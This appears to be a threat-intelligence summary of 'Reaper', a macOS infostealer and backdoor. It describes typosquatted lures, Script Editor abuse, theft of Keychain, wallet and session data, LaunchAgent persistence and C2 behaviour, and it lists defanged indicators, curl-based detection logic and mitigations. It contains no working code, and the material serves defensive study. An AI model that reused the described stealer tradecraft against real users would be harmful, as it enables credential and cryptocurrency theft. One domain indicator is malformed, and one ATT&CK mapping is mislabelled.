Full Report
While also spoofing all the trusted domains - Apple, Microsoft, and Google - in the same attack
Analysis Summary
This summary is based on the technical analysis provided in the article regarding the evolution of the SHub stealer into the variant known as **Reaper**.
# Tool/Technique: Reaper (SHub Stealer Variant)
## Overview
Reaper is a sophisticated macOS infostealer and backdoor that evolved from the SHub malware family. It employs social engineering via typosquatted domains and exploits Apple’s Script Editor to bypass security enhancements introduced in macOS Tahoe. Its primary purpose is the theft of credentials, cryptocurrency, and sensitive business documents, while maintaining long-term access via a persistent backdoor.
## Technical Details
- **Type:** Malware Family (Infostealer / Backdoor)
- **Platform:** macOS
- **Capabilities:** Credential harvesting, cryptocurrency wallet injection, file exfiltration, and remote code execution (RCE).
- **First Seen:** Reported May 2026 (SentinelOne research).
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
- [T1566.002 - Phishing: Spearphishing Link] (Typosquatted domains like mlcrosoft[.]co[.)com)
- **[TA0002 - Execution]**
- [T1059.002 - Command and Scripting Interpreter: AppleScript]
- **[TA0003 - Persistence]**
- [T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder] (LaunchAgents)
- **[TA0005 - Defense Evasion]**
- [T1027 - Obfuscated Files or Information] (ASCII padding in Script Editor)
- [T1036.004 - Masquerading: Masquerade Task or Service] (Spoofing Google Software Update)
- **[TA0009 - Collection]**
- [T1539 - Steal Web Session Cookie]
- [T1555 - Credentials from Password Stores]
- **[TA0011 - Command and Control]**
- [T1105 - Ingress Tool Transfer] (curl-based payloads)
## Functionality
### Core Capabilities
- **Browser/System Theft:** Scrapes browser data, macOS Keychain, iCloud account data, and Telegram session information.
- **Credential Phishing:** Tricks users into entering login credentials via a fake "XProtectRemediator" security update popup.
- **Crypto-Theft:** Targets MetaMask and Phantom browser extensions; searches for desktop wallets like Exodus, Atomic, Ledger, and Trezor.
### Advanced Features
- **Wallet Injection:** Injects malware directly into detected cryptocurrency wallet applications to ensure ongoing theft.
- **File Grabber:** Specifically targets the Desktop and Documents folders for financial and business-related files.
- **Persistent Backdoor:** Establishes a heartbeat to a C2 server every 60 seconds, allowing for arbitrary remote code execution (RCE) with user privileges.
- **Anti-Analysis/Evasion:** Uses JavaScript-based fingerprinting to detect VMs/VPNs and employs geofencing (terminates if the victim is located in Russia).
## Indicators of Compromise
*Note: Indicators have been defanged.*
- **File Names:** `GoogleUpdate`, `XProtectRemediator` (Spoofed)
- **Registry/Path Indicators:** `~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/`
- **Network Indicators:**
- `mlcrosoft[.]co[.]com` (Initial landing page)
- `/api/bot/heartbeat` (C2 endpoint)
- **Behavioral Indicators:**
- High frequency of AppleScript execution via `Script Editor.app`.
- Unexpected `curl` commands initiated by AppleScripts.
- Persistent LaunchAgents mimicking legitimate software (Google/Apple).
## Associated Threat Actors
- **SHub Operators:** This is a direct evolution of the SHub/ClickFix malware campaigns.
## Detection Methods
- **Signature-based detection:** Monitoring for the specific directory structure used for the fake Google Update.
- **Behavioral detection:** Flagging `Script Editor` when it attempts to call `curl` to download shell scripts from external domains.
- **YARA:** Detection of the specific ASCII padding patterns used within `.scpt` or AppleScript files to hide payloads.
## Mitigation Strategies
- **User Education:** Train users to recognize typosquatted domains and to be wary of scripts that open automatically in Script Editor.
- **System Hardening:** Use Mobile Device Management (MDM) to restrict the execution of unsigned AppleScripts.
- **Access Control:** Implement strict outgoing network filtering (Egress filtering) to block unauthorized connections to unknown C2 endpoints.
## Related Tools/Techniques
- **AMOS (Atomic macOS Stealer):** Shares similar document-theft and crypto-targeting logic.
- **ClickFix:** The precursor campaign style that uses social engineering to trick users into running terminal or script commands.